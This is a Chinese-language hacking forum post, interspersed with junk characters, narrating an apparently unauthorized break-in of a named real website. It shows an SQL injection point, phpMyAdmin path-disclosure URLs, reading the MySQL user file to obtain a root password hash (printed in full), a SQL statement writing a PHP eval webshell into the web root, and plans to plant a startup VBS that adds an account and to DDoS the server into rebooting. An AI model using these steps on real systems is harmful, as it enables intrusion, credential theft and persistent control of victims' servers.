第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏
5 A0 K( C! N/ d: O! Z发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!! x/ c6 D9 t# t& U/ ?5 y- O4 r
) L/ @* u8 T9 ~# Y. a l2 V
. P! D E0 P1 e& I7 K
8 g% S8 z2 g* i( u( `常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 4 x, o. Q Z _) b
3 ?4 P/ C4 O, O$ H$ M' T) k& ]( d那么想可以直接写入shell ,getshell有几个条件: w/ I1 ~ s. {: t
1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF 9 V5 Z2 F$ r% q; h7 m( Q
8 Z* a+ I( H% N& k% ~# F试着爆绝对路径:
) K J* e y$ Q1./phpMyAdmin/index.php?lang[]=1
1 r% S) z" i" v# ` R9 V2./phpMyAdmin/phpinfo.php , V( F$ M* b, B) F+ }, v
3./load_file() / K& F3 P* l `( r& S; k3 T
4./phpmyadmin/themes/darkblue_orange/layout.inc.php
; u. p" {; W9 P6 d5 D3 y5./phpmyadmin/libraries/select_lang.lib.php
+ G0 {5 @1 \: `/ T5 l6./phpmyadmin/libraries/lect_lang.lib.php 3 O, N/ t; ]0 j$ |9 |
7./phpmyadmin/libraries/mcrypt.lib.php
/ b1 E# q Q0 D% K6 t, A8./phpmyadmin/libraries/export/xls.php ' ]$ g" Y5 B+ g+ \: O
5 \3 V1 o7 y5 H均不行...........................
- D& d5 ?9 K9 @( U4 J7 ^$ p, W s7 q5 H. _. a3 e. `3 u* F; @; ]3 p
御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php ' R( g4 ]& X( n$ n
& F' H; c' T+ ]! i7 {权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
$ E# a$ W) }6 M; {
& V- Z) D5 K0 Z+ c默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
. k3 j- |5 ?( p$ P, m4 u/ K; ^/ G. t7 G) o2 f( j* K2 k
敏感东西: http://202.103.49.66/Admincp.php 社工进不去...........
" c4 `, e% c& G' b1 n& L( I& t4 \* T4 g+ e! f
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell
; M* N0 I. |7 o/ N3 v7 t6 h5 `8 d1 I$ K! y- U9 Q5 G1 L: T
http://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini
4 f- K0 F0 W" V1 }3 j* U+ L7 p ? l
; U8 ^4 d3 h: ]( v0 Q自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD : p: m; i3 j( o4 M( ?: f& M0 B
; {0 J1 I; b c. T ^6 U6 @
成功读到root密码: * b% v( f7 P, d: W" t
% d! E' O. @ o4 l) D
17---- r(0072)
, w3 d% K" R# r; m18---- o(006f) / _5 ^" [8 A0 r5 x" w
19---- o(006f) " g4 W% S, T* H! P+ Q) d& \
20---- t(0074) 0 H$ C- p7 S$ I; J, X
21---- *(002a)
9 a4 c/ k' A' m22---- 8(0038)
) n- C: L8 c( N5 A23---- 2(0032) $ ^: f! B! S4 m L6 p6 v, V2 n" p
24---- E(0045)
& ^6 ^3 W1 o1 n+ h( E25---- 1(0031) $ q% o: K4 P# E) h8 d
26---- C(0043)
r1 G& D3 R* w; e27---- 5(0035) 9 [3 V, r, G+ G0 _
28---- 8(0038) 5 [% R% O* b I! |' Y
29---- 2(0032) " J6 u3 x6 [/ p
30---- 8(0038) 5 L3 U2 y; l: g* U' f& r$ p
31---- A(0041)
- c, t3 N, G+ `4 [8 g% R32---- 9(0039)
/ J7 c; H8 X+ u( B$ i33---- B(0042) ! u1 M, J! Q0 N( B* g, U4 L7 l2 l
34---- 5(0035) 4 @7 l. O, w" X0 h' u7 M% z9 X
35---- 4(0034) * {* D0 _4 _7 u. o/ z5 R
36---- 8(0038) 0 ~: a- b+ F/ f4 J2 M
37---- 6(0036)
' r/ E* X+ c( }5 k, z; \5 |' y38---- 4(0034)
8 `; [9 U) Y- m" y) r39---- 9(0039)
7 `7 L1 Y! i$ Q/ l( m% T40---- 1(0031) . j8 c+ e: L+ L( z2 j* h
41---- 1(0031) " `! Y. n( P4 i. r- j% F8 \
42---- 5(0035)
: i9 p9 g* u$ w9 V2 j& p6 m43---- 3(0033) ( p7 ]2 f1 l$ {
44---- 5(0035) - b3 f7 N: f. E8 V) I( ?
45---- 9(0039)
/ W5 w' g: q, U- v6 I46---- 8(0038)
2 f% {& x! y3 I: n& C+ S3 t47---- F(0046)
9 u* v: h' o/ Z! K6 E; B48---- F(0046)
( d- t6 O& o! K8 E# m% ]# ]- w49---- 4(0034)
8 r; @; Y9 \' I8 b8 C4 S50---- F(0046)
: H: Q. v9 d2 X& ^51---- 0(0030) % V+ G" M; h- V
52---- 3(0033) # t5 o: X# ^" @9 J" v+ K
53---- 2(0032) 4 Y' s& _; ~8 N9 j
54---- A(0041)
' S3 ~! f# p. Z; B& }55---- 4(0034)
$ ^, b2 v- F9 i) }. g* E56---- A(0041) 6 v) j5 X9 D; E+ C1 ^ G8 V0 r
57---- B(0042)
5 [2 A/ B8 e) d" P58---- *(0044) 4 q1 P9 F) y: @2 F5 p+ W$ m- l
59---- *(0035) + T% W+ i+ ]% a4 G; X5 H7 i7 k
60---- *(0041)
, X1 M+ e. h, I61---- *0032) ; n0 L, b; T3 p' N% c4 |% g
# i2 n9 [* e6 w' k+ u0 H, h解密后成功登陆phpmyamin 4 m7 J! l9 g) a+ O0 Y5 z4 q2 n& g
$ p1 u$ x7 D, h( B0 @
1 L Z: B" I1 ]) O6 W9 Z
. h5 F9 F' K! G4 G
. p9 L! S/ H, q( |# Y找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
( g- t5 E: y/ j6 _
5 _0 o( W& i( v$ U+ S成功执行,拿下shell,菜刀连接:
8 c% {2 B: z9 d$ v8 X; N% e- c6 Q' p# O% P$ v N
服务器不支持asp,aspx,php提权无果................... G$ s8 C4 T1 ?
" _& D1 S* L) z( C8 x1 }4 z: T
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
2 x* H* G) j! u服务器上已经有个隐藏帐号了 ( w: f. Y7 e j% C- }! W
别名 administrators
, A& X: g, i! e% ]4 b注释 管理员对计算机/域有不受限制的完全访问权 , M$ Y. p2 \; ^8 X% M5 F
成员
& {, ~9 U' k/ h% t$ l( Q% e1 t4 x-------------------------------------------------------------------------------$ W0 } p3 m2 T) v2 j
admin; D( j; j2 X9 K1 L& d# {7 S
Administrator! Y3 m$ v4 r7 o
slipper$
6 x4 q1 k. m. @sqluser+ ]; _8 Z8 x" o* G9 f+ d
命令成功完成。 + I6 k; o) f+ Y( h# i1 ~
# ] `. ?6 P' j+ N服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。
/ a% H" j, ?$ e1 p3 k) ?6 ` o8 l2 E+ I/ _6 N6 x% {- k$ P8 v
ddos服务器重启,不然就只能坐等服务器重启了...............................
, S( J$ h3 |/ Y, @0 l' |
8 T2 k6 Y# {9 S
T6 K+ u9 ?5 e3 J$ k' E6 c |